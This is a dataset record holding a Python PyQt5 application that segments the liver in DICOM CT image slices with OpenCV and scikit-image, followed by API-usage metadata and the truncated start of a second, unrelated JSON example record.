cv2\r\nimport numpy as np\r\nimport skimage\r\n#import matplotlib.pyplot as plt\r\nimport warnings\r\nimport threading\r\n#import mritopng\r\nimport re\r\nimport time\r\nimport shutil\r\nfrom PyQt5.QtWidgets import QDialog, QApplication\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtGui import QPixmap,QImage\r\nfrom MainUI import MainUI_Dialog,Multi_Dialog,Reveal_Dialog\r\nfrom skimage import morphology\r\nfrom numba import jit \r\nimport datetime\r\n\r\n\r\nInitialization = False\r\n\r\ndef sorted_aphanumeric(data):\r\n convert = lambda text: int(text) if text.isdigit() else text.lower()\r\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \r\n return sorted(data, key=alphanum_key)\r\n\r\ndef SaveLogs(txt):\r\n now = datetime.datetime.now()\r\n string = \"Logs/\"+str(now.year)+\"-\"+str(now.month)+\"-\"+str(now.day)+\"#\"+str(now.hour)+str(now.minute)+\".txt\"\r\n fp = open(string, \"a\")\r\n fp.write(txt)\r\n fp.close()\r\n\r\nclass Dicom():\r\n def __init__(self):\r\n self.index = 0\r\n self.save_index = -1\r\n self.bottom_index = -1\r\n self.top_index = -1\r\n self.BoneValue = 210 #Best:210\r\n self.LiverValue = 178 #Best:178 FROM MIDDLE IN DATASET\r\n self.dpath = \"Dicoms\"\r\n self.rpath = \"Registers\"\r\n self.LoopProcess = False\r\n self.dfiles = sorted_aphanumeric(os.listdir(self.dpath))\r\n self.rfiles = sorted_aphanumeric(os.listdir(self.rpath))\r\n self.len = len(self.rfiles)\r\n self.Dicom2jpg(self.index)\r\n self.afreaVol = 0\r\n self.setArea = 0\r\n self.setSliceLocations = []\r\n self.setImagePositon_z = []\r\n print(\"Index:\"+str(self.index))\r\n \r\n # if you need to convert to image file from dicom, use this function. \r\n def Dicom2jpg(self,value):\r\n self.index = value\r\n self.rpath = \"Registers/\" + self.rfiles[self.index]\r\n self.Image = cv2.imread(self.rpath,0)\r\n self.TargetImage = cv2.imread(self.rpath,0)\r\n self.ReturnImage = cv2.imread(self.rpath,0)\r\n if os.path.isfile(self.rpath):\r\n pass\r\n else:\r\n self.fullpath = os.path.join(self.dpath, self.dfiles[self.index])\r\n path = os.getcwd()\r\n os.system(\"cd \"+ path)\r\n #ds = pydicom.read_file(self.fullpath)\r\n #img = ds.pixel_array\r\n \r\n outpath = \"Registers\"\r\n cmd = 'dcm2jpg -o ' + os.path.abspath(outpath) + ' ' + os.path.abspath(self.fullpath)\r\n os.system(cmd)\r\n #scaled_img = cv2.convertScaleAbs(img-np.min(img), alpha=(255.0 / min(np.max(img)-np.min(img), 10000)))\r\n #with warnings.catch_warnings():\r\n # warnings.simplefilter(\"ignore\")\r\n # scipy.misc.imsave(self.rpath,img)\r\n #cv2.imwrite(self.rpath,scaled_img) # write png image\r\n self.Image = cv2.imread(self.rpath,0)\r\n self.TargetImage = cv2.imread(self.rpath,0)\r\n\r\n \r\n def CreateTempImage(self):\r\n win.SetPixmap()\r\n \r\n def MedianBlurImage(self,img):\r\n img = cv2.medianBlur(img, 5) \r\n #print(\"MedianBlurImage\")\r\n return img\r\n \r\n def BinaryImage(self,img,value):\r\n ret,img = cv2.threshold(img, value, 255, cv2.THRESH_BINARY)\r\n #print(\"BinaryImage\")\r\n return img\r\n \r\n def OtsuImage(self,img):\r\n ret,img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)\r\n #print(\"OtsuImage\")\r\n return img\r\n\r\n def DilateImage(self,img):\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5, 5)) \r\n img = cv2.dilate(img, kernel) \r\n #print(\"DilateImage\")\r\n return img\r\n\r\n def ClearTheBone(self,img):\r\n original = self.Image\r\n for i in range(0,img.shape[0]):\r\n for j in range(0,img.shape[1]):\r\n if(img[i,j] != 0): \r\n original[i,j] = 0; \r\n \r\n self.Image = cv2.imread(self.rpath,0)\r\n img = original\r\n #print(\"ClearTheBone\")\r\n return img\r\n \r\n def CloseImage(self,img,value):\r\n kernel = np.ones((value,value), np.uint8)\r\n img = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel)\r\n #print(\"CloseImage\")\r\n return img\r\n \r\n def MeasureLabel(self,img):\r\n labels=skimage.measure.label(self.TargetImage,connectivity=2) \r\n cv2.imshow(\"test\",self.TargetImage)\r\n regions = skimage.measure.regionprops(labels)\r\n self.MaxLabel = []\r\n for i in range(labels.max()):\r\n self.MaxLabel.append(regions[i]['area'])\r\n self.MaxLabel.sort(reverse=True)\r\n skimage.morphology.remove_small_objects(labels, min_size=self.MaxLabel[0], connectivity=2, in_place=True)\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n cv_image = skimage.img_as_ubyte(labels)\r\n \r\n img = cv_image\r\n #print(\"MeasureLabel\")\r\n return img\r\n \r\n def CannyImage(self,img):\r\n canny = cv2.Canny(img, 3, 3)\r\n img = cv2.addWeighted(self.Image, 1, canny, 1, 0)\r\n #print(\"CannyImage\")\r\n return img\r\n \r\n def FindContours(self,tarimg,img,Type=1):\r\n index = str(self.index)\r\n index = index.zfill(6)\r\n if Type == 1:\r\n contours, hierarchy = cv2.findContours(tarimg,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\r\n cv2.drawContours(img,contours,-1,(0,0,255),3)\r\n backtorgb = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n cv2.drawContours(backtorgb,contours,-1,(0,0,255),3)\r\n cv2.imwrite (\"Produce_bmp/\"+index+\".bmp\", backtorgb)\r\n else:\r\n contours, hierarchy = cv2.findContours(tarimg,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\r\n c_max = []\r\n c_maxArea = []\r\n for i in range(len(contours)):\r\n cnt = contours[i]\r\n area = cv2.contourArea(cnt)\r\n #perimeter = cv2.arcLength(cnt,True)\r\n c_maxArea.append(area)\r\n \r\n for c in range(len(contours)):\r\n cnt = contours[c]\r\n area = cv2.contourArea(cnt)\r\n #perimeter = cv2.arcLength(cnt,True)\r\n #if(area > max(c_maxArea)/3):\r\n c_max.append(cnt)\r\n print(area)\r\n self.setArea = self.setArea+area\r\n print(\"Summary:\"+str(self.setArea))\r\n #perimeter = cv2.arcLength(cnt,True)\r\n #print(perimeter)\r\n \r\n cv2.drawContours(img,c_max,-1,(0,0,255),3)\r\n backtorgb = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n cv2.drawContours(backtorgb,contours,-1,(0,0,255),3)\r\n cv2.imwrite (\"Produce_bmp/\"+index+\".bmp\", backtorgb)\r\n \r\n #print(\"FindContours\")\r\n return img\r\n \r\n def ConvertToDicom(self,img):\r\n ds = pydicom.read_file(self.fullpath)\r\n for i in range(0,img.shape[0]):\r\n for j in range(0,img.shape[1]):\r\n if(img[i,j] == 0):\r\n ds.pixel_array[i,j] = 0;\r\n ds.PixelData = ds.pixel_array.tostring() \r\n index = str(self.index)\r\n index = index.zfill(6)\r\n ds.save_as(\"Produce_dcm/\"+index+\".dcm\")\r\n print(\"# convert to 'Dicom' completed.\")\r\n \r\n def ResizeImageArray(self,img,cropType):\r\n areaVol = 0 \r\n for row in range(0,img.shape[0]):\r\n for col in range(0,img.shape[1]):\r\n if(img[row,col] == 255):\r\n areaVol += 1\r\n \r\n if(cropType == 2):\r\n if((areaVol - self.afreaVol) > 0):\r\n print(\"Current state: Liver is getting bigger!\")\r\n if(abs(areaVol - self.afreaVol) > areaVol/30):\r\n print(\"Current state: Liver gap is too large, back to original sample!\")\r\n else:\r\n self.CanyImage = self.ExtendImage(img,5)\r\n else:\r\n print(\"Current state: Liver is getting smaller!\")\r\n if(abs(areaVol - self.afreaVol) > areaVol/30):\r\n print(\"Current state: Liver gap is too large, back to original sample!\")\r\n else:\r\n self.CanyImage = self.ExtendImage(img,1)\r\n else:\r\n self.CanyImage = img\r\n \r\n self.afreaVol = areaVol\r\n print(\"Surface Area: \",areaVol)\r\n \r\n @jit\r\n def ExtendImage(self,result,value):\r\n for times in range(value):\r\n for row in range(0,result.shape[0]):\r\n for col in range(0,result.shape[1]):\r\n if(result[row,col] == 255):\r\n if(result[row-1,col] == 0):\r\n result[row-1,col] = 255\r\n if(result[row+1,col] == 0):\r\n result[row+1,col] = 254\r\n if(result[row,col-1] == 0):\r\n result[row,col-1] = 255\r\n if(result[row,col+1] == 0):\r\n result[row,col+1] = 254\r\n if(result[row,col] == 254):\r\n result[row,col] = 255\r\n #print(\"ExtendImage\")\r\n return result\r\n \r\n def SetRevealPixmap(self,img):\r\n rev.show()\r\n height, width = img.shape\r\n qImg = QImage(dicom.TargetImage.data, width, height, width, QImage.Format_Grayscale8)\r\n qPixImg = QPixmap(QPixmap.fromImage(qImg))\r\n rev.ui.label.setPixmap(qPixImg)\r\n \r\n def ReadTargetImage(self):\r\n #img = cv2.imread('Image\\TargetImage.jpg',0)\r\n #cv2.imshow(\"test\",img)\r\n cv2.waitKey(1)\r\n \r\n def ProcessImage(self,Multing=0):\r\n print(\"Index:\"+str(self.index))\r\n dicom.TargetImage = dicom.Image\r\n dicom.TargetImage = dicom.MedianBlurImage(dicom.TargetImage)\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.BoneValue)\r\n dicom.TargetImage = dicom.DilateImage(dicom.TargetImage)\r\n dicom.TargetImage = dicom.ClearTheBone(dicom.TargetImage)\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.LiverValue)\r\n dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,3)\r\n dicom.TargetImage = dicom.MeasureLabel(dicom.TargetImage)\r\n dicom.TargetImage = dicom.OtsuImage(dicom.TargetImage)\r\n dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,30)\r\n dicom.ResizeImageArray(dicom.TargetImage,1)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg2 = self.Image.copy()\r\n dicom.TargetImage = dicom.FindContours(tarImg,tarImg2) \r\n if(Multing == 0):\r\n self.CreateTempImage()\r\n th = threading.Thread(self.ReadTargetImage())\r\n th.start()\r\n print(\"process to 'Original Image' completed.\")\r\n print(\"=====================================\")\r\n \r\n def ProcessCropImage(self,Multing=False):\r\n print(\"Index:\"+str(self.index))\r\n dicom.TargetImage = self.Image\r\n for i in range(0,dicom.TargetImage.shape[0]):\r\n for j in range(0,dicom.TargetImage.shape[1]):\r\n if(dicom.CanyImage[i,j] == 0):\r\n dicom.TargetImage[i,j] = 0\r\n self.Image = cv2.imread(self.rpath,0)\r\n dicom.TargetImage = dicom.MedianBlurImage(dicom.TargetImage)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg = dicom.BinaryImage(tarImg,dicom.BoneValue)\r\n for i in range(0,tarImg.shape[0]):\r\n for j in range(0,tarImg.shape[1]):\r\n if(tarImg[i,j] != 0):\r\n dicom.TargetImage[i,j] = 0;\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.LiverValue)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg = dicom.CloseImage(tarImg,15)\r\n dicom.ResizeImageArray(tarImg,2)\r\n dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,10)\r\n dicom.ConvertToDicom(dicom.TargetImage)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg2 = self.Image.copy()\r\n dicom.TargetImage = dicom.FindContours(tarImg,tarImg2,2) \r\n if(Multing == False):\r\n cv2.imwrite('Image\\TargetImage.jpg', dicom.TargetImage, [cv2.IMWRITE_JPEG_QUALITY, 90])\r\n self.CreateTempImage()\r\n #self.SetRevealPixmap()\r\n th = threading.Thread(self.ReadTargetImage())\r\n th.start()\r\n print(\"process to 'Inherit Image' completed.\")\r\n print(\"==================================\")\r\n\r\nclass MainUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = MainUI_Dialog()\r\n self.ui.setupUi(self)\r\n self.ui.spinBox.setRange(0, dicom.len-1)\r\n self.ui.spinBox_2.setRange(0, 255)\r\n self.ui.horizontalSlider.setMaximum(dicom.len-1)\r\n self.ui.verticalSlider.setMaximum(255)\r\n self.ui.spinBox.valueChanged.connect(self.SpinBoxValueChanged)\r\n self.ui.spinBox_2.valueChanged.connect(self.SpinBox2ValueChanged)\r\n self.ui.pushButton.clicked.connect(self.OnPushButtonClicked)\r\n self.ui.pushButton_2.clicked.connect(self.OnPushButton_2Clicked)\r\n self.ui.pushButton_7.clicked.connect(self.OnPushButton_7Clicked)\r\n self.ui.label.setScaledContents (True)\r\n self.pixmap = QPixmap(dicom.rpath)\r\n self.ui.label.setPixmap(self.pixmap)\r\n self.ui.label_5.setPixmap(self.pixmap)\r\n self.ui.spinBox.setValue(dicom.index)\r\n self.ui.spinBox_2.setValue(dicom.LiverValue)\r\n \r\n def SpinBoxValueChanged(self):\r\n dicom.Dicom2jpg(self.ui.spinBox.value())\r\n if dicom.LoopProcess == False:\r\n self.SetPixmap()\r\n self.SetOriginalPixmap(dicom.rpath) \r\n \r\n def SetPixmap(self):\r\n height, width = dicom.TargetImage.shape\r\n qImg = QImage(dicom.TargetImage.data, width, height, width, QImage.Format_Grayscale8)\r\n qPixImg = QPixmap(QPixmap.fromImage(qImg))\r\n self.ui.label.setPixmap(qPixImg)\r\n return qPixImg\r\n \r\n def SetOriginalPixmap(self,path):\r\n self.pixmap = QPixmap(path)\r\n self.ui.label_5.setPixmap(self.pixmap)\r\n \r\n def SpinBox2ValueChanged(self):\r\n if Initialization == True:\r\n dicom.LiverValue = self.ui.spinBox_2.value()\r\n \r\n def OnPushButtonClicked(self):\r\n if Initialization == True:\r\n dicom.TargetImage = dicom.Image\r\n dicom.ProcessImage()\r\n \r\n def OnPushButton_2Clicked(self):\r\n mul.ProcessBreak = False\r\n mul.ui.pushButton.setEnabled(False)\r\n mul.ui.pushButton_2.setEnabled(False)\r\n mul.ui.label.setText(\"Image Processing ...\")\r\n mul.ui.label_2.setText(\"Image Processing ...\")\r\n mul.ui.label_3.setText(\"Image Processing ...\")\r\n mul.ui.label_4.setText(\"Image Processing ...\")\r\n mul.ui.label_5.setText(\"Image Processing ...\")\r\n mul.ui.label_6.setText(\"Image Processing ...\")\r\n mul.ui.label_7.setText(\"Image Processing ...\")\r\n mul.ui.label_8.setText(\"Image Processing ...\")\r\n mul.show()\r\n win.hide()\r\n th = threading.Thread(target=self.StartMultiDialog)\r\n th.start()\r\n \r\n def OnPushButton_7Clicked(self):\r\n dir_choose = QFileDialog.getExistingDirectory(self,\"Select Data Folder\",\"src\\Dicoms\") \r\n\r\n if dir_choose == \"\":\r\n print(\"\\nCancel\")\r\n return\r\n\r\n print(\"\\nSelected Data Folder:\")\r\n print(dir_choose) \r\n dfiles = sorted_aphanumeric(os.listdir(dir_choose))\r\n dpath = \"Dicoms\"\r\n outpath = \"Registers\"\r\n \r\n try:\r\n #shutil.rmtree(dpath)\r\n #shutil.rmtree(outpath)\r\n os.system(\"rd/s/q \"+dpath)\r\n os.system(\"rd/s/q \"+outpath)\r\n pass\r\n except OSError as e:\r\n print(e)\r\n else:\r\n print(\"The directory is deleted successfully\")\r\n \r\n os.mkdir(dpath)\r\n os.mkdir(outpath)\r\n path = os.getcwd()\r\n for i in range(1,len(dfiles)):\r\n print(dfiles[i])\r\n print(dir_choose)\r\n fixedpath = os.path.abspath(dir_choose)\r\n inputpath = fixedpath + \"/\" +str(dfiles[i])\r\n fullpath = os.path.join(dpath, dfiles[i])\r\n shutil.copy(inputpath, dpath) \r\n os.system(\"cd \"+ path) \r\n cmd = 'dcm2jpg -o ' + os.path.abspath(outpath) + ' ' + os.path.abspath(fullpath)\r\n os.system(cmd)\r\n print(\"===========Data imported successfully, please restart the program!===========\")\r\n sys.exit(app.exec_())\r\n \r\n def LoopProcessCropImag(self):\r\n stage = 0\r\n for i in range(dicom.bottom_index,dicom.top_index+2):\r\n if Initialization == True:\r\n if stage == 0:\r\n dicom.ProcessCropImage()\r\n dicom.index = dicom.index + 1\r\n self.ui.spinBox.setValue(dicom.index)\r\n if dicom.index == dicom.top_index+1:\r\n stage = 1\r\n elif stage == 1:\r\n dicom.index = dicom.save_index-1\r\n self.ui.spinBox.setValue(dicom.index)\r\n dicom.TargetImage = dicom.Image\r\n dicom.ProcessImage()\r\n stage = 2\r\n elif stage == 2:\r\n dicom.ProcessCropImage()\r\n dicom.index = dicom.index - 1\r\n self.ui.spinBox.setValue(dicom.index) \r\n if dicom.index == dicom.bottom_index-1:\r\n print(\"Consecutive liver segmentation completed!\")\r\n self.tEnd = time.time()\r\n print(\"It cost %f sec\" % (self.tEnd - self.tStart))\r\n string = \"Index:\"+str(dicom.bottom_index)+\" to \"+str(dicom.top_index)+\"slice\\nTime:\"+str(self.tEnd - self.tStart)+\"seconds\\nSurface:\"+ str(dicom.setArea) + \"\"\r\n SaveLogs(string)\r\n dicom.LoopProcess = False\r\n \r\n def SetLabelPixmap(self,sheet):\r\n if sheet == 0:\r\n mul.ui.label.setPixmap(self.pix[0])\r\n elif sheet == 1:\r\n mul.ui.label_2.setPixmap(self.pix[1])\r\n elif sheet == 2:\r\n mul.ui.label_3.setPixmap(self.pix[2])\r\n elif sheet == 3:\r\n mul.ui.label_4.setPixmap(self.pix[3])\r\n elif sheet == 4:\r\n mul.ui.label_5.setPixmap(self.pix[4])\r\n elif sheet == 5:\r\n mul.ui.label_6.setPixmap(self.pix[5])\r\n elif sheet == 6:\r\n mul.ui.label_7.setPixmap(self.pix[6])\r\n elif sheet == 7:\r\n mul.ui.label_8.setPixmap(self.pix[7])\r\n \r\n def StartMultiDialog(self):\r\n self.OriginalValue = dicom.LiverValue\r\n self.value = [dicom.LiverValue+80,dicom.LiverValue+60,dicom.LiverValue+40,dicom.LiverValue+20,dicom.LiverValue,dicom.LiverValue-20,dicom.LiverValue-40,dicom.LiverValue-60]\r\n for i in range(len(self.value)):\r\n if self.value[i] > 250:\r\n self.value[i] = 250\r\n elif self.value[i] < 1:\r\n self.value[i] = 1\r\n self.pix = []\r\n mul.ui.radioButton.setText(\"\"+str(self.value[0]))\r\n mul.ui.radioButton_2.setText(\"\"+str(self.value[1]))\r\n mul.ui.radioButton_3.setText(\"\"+str(self.value[2]))\r\n mul.ui.radioButton_4.setText(\"\"+str(self.value[3]))\r\n mul.ui.radioButton_5.setText(\"\"+str(self.value[4]))\r\n mul.ui.radioButton_6.setText(\"\"+str(self.value[5]))\r\n mul.ui.radioButton_7.setText(\"\"+str(self.value[6]))\r\n mul.ui.radioButton_8.setText(\"\"+str(self.value[7]))\r\n for i in range(8):\r\n if mul.ProcessBreak == False:\r\n print(\"The \"+str(i+1)+\" image is being processed.\")\r\n dicom.LiverValue = self.value[i]\r\n dicom.ProcessImage(1)\r\n self.pix.append(self.SetPixmap())\r\n self.SetLabelPixmap(i)\r\n \r\n mul.ui.pushButton.setEnabled(True)\r\n mul.ui.pushButton_2.setEnabled(True)\r\n dicom.LiverValue = self.OriginalValue\r\n\r\n \r\nclass MultiUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Multi_Dialog()\r\n self.ui.setupUi(self)\r\n self.ui.pushButton.clicked.connect(self.OnPushButtonClicked)\r\n self.ui.pushButton_2.clicked.connect(self.OnPushButton_2Clicked)\r\n self.ui.label.setScaledContents(True)\r\n self.ui.label_2.setScaledContents(True)\r\n self.ui.label_3.setScaledContents(True)\r\n self.ui.label_4.setScaledContents(True)\r\n self.ui.label_5.setScaledContents(True)\r\n self.ui.label_6.setScaledContents(True)\r\n self.ui.label_7.setScaledContents(True)\r\n self.ui.label_8.setScaledContents(True)\r\n self.ProcessBreak = False\r\n \r\n def OnPushButtonClicked(self):\r\n self.ProcessBreak = True\r\n if self.ui.radioButton.isChecked():\r\n dicom.LiverValue = win.value[0]\r\n elif self.ui.radioButton_2.isChecked():\r\n dicom.LiverValue = win.value[1]\r\n elif self.ui.radioButton_3.isChecked():\r\n dicom.LiverValue = win.value[2]\r\n elif self.ui.radioButton_4.isChecked():\r\n dicom.LiverValue = win.value[3]\r\n elif self.ui.radioButton_5.isChecked():\r\n dicom.LiverValue = win.value[4]\r\n elif self.ui.radioButton_6.isChecked():\r\n dicom.LiverValue = win.value[5]\r\n elif self.ui.radioButton_7.isChecked():\r\n dicom.LiverValue = win.value[6]\r\n elif self.ui.radioButton_8.isChecked():\r\n dicom.LiverValue = win.value[7]\r\n \r\n win.ui.spinBox_2.setValue(dicom.LiverValue)\r\n dicom.ProcessImage()\r\n mul.hide()\r\n win.show()\r\n \r\n def OnPushButton_2Clicked(self):\r\n self.ProcessBreak = True\r\n dicom.TargetImage = dicom.Image\r\n dicom.CreateTempImage()\r\n mul.hide()\r\n win.show()\r\n \r\nclass RevealUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Reveal_Dialog()\r\n self.ui.setupUi(self)\r\n \r\n\r\n \r\nif __name__ == '__main__':\r\n np.set_printoptions(threshold=np.inf)\r\n dicom = Dicom()\r\n app = QApplication(sys.argv)\r\n win = MainUI()\r\n mul = MultiUI()\r\n rev = RevealUI()\r\n win.show()\r\n #mul.show()\r\n #dicom.ProcessImage()\r\n Initialization = True\r\n sys.exit(app.exec_())\r\n", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 22745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.split", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 70, "usage_type": "call"}, {"api_name": "os.system", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 106, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 124, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "skimage.measure.label", "line_number": 130, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 131, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 132, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 132, "usage_type": "attribute"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 137, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 137, "usage_type": "attribute"}, {"api_name": "warnings.catch_warnings", "line_number": 138, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 139, "usage_type": "call"}, {"api_name": "skimage.img_as_ubyte", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 147, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 148, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.RETR_CCOMP", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 158, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 162, "usage_type": "call"}, {"api_name": "cv2.RETR_CCOMP", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 186, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 192, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 229, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 251, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_Grayscale8", "line_number": 251, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 258, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 290, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 308, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 308, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 311, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 316, "usage_type": "name"}, {"api_name": "MainUI.MainUI_Dialog", "line_number": 320, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 332, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 346, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_Grayscale8", "line_number": 346, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 347, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 347, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 352, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 378, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 382, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 382, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 390, "usage_type": "call"}, {"api_name": "os.system", "line_number": 397, "usage_type": "call"}, {"api_name": "os.system", "line_number": 398, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 405, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 406, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path", "line_number": 411, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 414, "usage_type": "call"}, {"api_name": "os.system", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 416, "usage_type": "call"}, {"api_name": "os.path", "line_number": 416, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 417, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 419, "usage_type": "call"}, {"api_name": "time.time", "line_number": 443, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 497, "usage_type": "name"}, {"api_name": "MainUI.Multi_Dialog", "line_number": 501, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 546, "usage_type": "name"}, {"api_name": "MainUI.Reveal_Dialog", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 556, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 558, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 558, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 566, "usage_type": "call"}]} +{"seq_id": "134041786", "text": "import json\n\n# json\nfriends = {'friends': [\n {\n 'name': 'Hayeon',\n 'bday': '24/08/1996'\n },\n {\n 'name': 'Minsoo',\n 'bday': 